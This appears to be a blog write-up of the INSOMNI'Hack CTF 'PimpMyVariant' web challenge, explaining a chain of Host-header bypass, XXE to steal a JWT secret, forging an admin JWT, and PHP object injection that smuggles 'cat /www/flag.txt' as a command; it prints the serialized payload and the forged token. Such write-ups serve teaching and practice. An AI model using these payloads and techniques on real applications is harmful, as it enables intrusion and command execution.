INSOMNI'Hack CTF (PimpMyVariant) web challenge
Let's solve PimpMyVariant web challenge.
First, we took a look at (robots.txt) file it show some useful endpoints
(todo) file has nothing and we can't access the flag file direct, so we took a look at the endpoints (readme, new, log) all of these endpoints we can't access with normal hostname we have to use localhost or 127.0.0.1 as a Host in the request to access these endpoints.
The first endpoint is readme which returns a path to a file just remember this file.
The second endpoint is (new) return a form in JS code which send a request to (/api) with XML format for the request body
it seems that there is XXE here we tried to send the same request, we tried to read the flag file but we couldn't because there is a regex for the name parameter which should be length 32 and only alphabet lower and uppercase and numbers with (_) and (-)
so we can't read the flag using this XXE because the flag format include {} and this will break the regex so let's try to read the file (/www/jwt.secret.txt) from (/readme) endpoint
after decoding the JWT value we notice that the value of the file is added to the end of a list and there is a PHP serialization in the JWT too.
the first thing you will notice is that the user is not an Admin and check using PHP serialization so easily we can modify this by setting the boolean value to true (1) and encoding the JWT using the secret key which we got using the XXE
where we will use this JWT? do you remember (/log) endpoint we can't access this endpoint if we are not an admin, now we are admin so let's try to access it
from the log endpoint, we found a file called (UpdateLogViewer.inc) we tried to read it using XXE but the regex stop us again, but we could download the file by writing the file directly in the browser (http://domain/UpdateLogViewer.inc) this file includes a PHP code which will help us to read the flag
it is a simple class that takes (PackageName) and (LogCMDReader) and it by default adds command (cat) which is used to read files but the variables are public so we can modify it using serialization from the JWT so we can add any Package name and Command to be executed, so we will add simple lines of code to generate Object from the class and send our command which we wanna execute but remember that to access the endpoint we should be an admin so we will add another object for User class with fixed values like and the two objects to an array, extracting this array in serialized format
a:2:{i:0;O:4:"User":3:{s:4:"name";s:4:"Flex";s:7:"isAdmin";b:1;s:2:"id";s:40:"b614a6abb42563aa38507862c1f33df0b43d57b3";}i:1;O:15:"UpdateLogViewer":2:{s:10:"packgeName";s:2:"xx";s:12:"logCmdReader";s:24:"cat /www/flag.txt && cat";}}
and JWT payload is
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ2YXJpYW50cyI6WyJBbHBoYSIsIkJldGEiLCJHYW1tYSIsIkRlbHRhIiwiT21pY3JvbiIsIkxhbWJkYSIsIkVwc2lsb24iLCJaZXRhIiwiRXRhIiwiVGhldGEiLCJJb3RhIiwiNTRiMTYzNzgzYzQ2ODgxZjFmZTdlZTA1ZjkwMzM0YWEiXSwic2V0dGluZ3MiOiJhOjI6e2k6MDtPOjQ6XCJVc2VyXCI6Mzp7czo0OlwibmFtZVwiO3M6NDpcIkZsZXhcIjtzOjc6XCJpc0FkbWluXCI7YjoxO3M6MjpcImlkXCI7czo0MDpcImI2MTRhNmFiYjQyNTYzYWEzODUwNzg2MmMxZjMzZGYwYjQzZDU3YjNcIjt9aToxO086MTU6XCJVcGRhdGVMb2dWaWV3ZXJcIjoyOntzOjEwOlwicGFja2dlTmFtZVwiO3M6MjpcInh4XCI7czoxMjpcImxvZ0NtZFJlYWRlclwiO3M6MjQ6XCJjYXQgL3d3dy9mbGFnLnR4dCAmJiBjYXRcIjt9fSIsImV4cCI6MTY0MzUyMDUwNX0.y5vJUwP6xSrolc98ffZlrADmkj3s80XnSCS9blNuV2s
we can read the flag now using the payload from the log endpoint
عاااش
ReplyDeleteعاش يا فليكس
ReplyDelete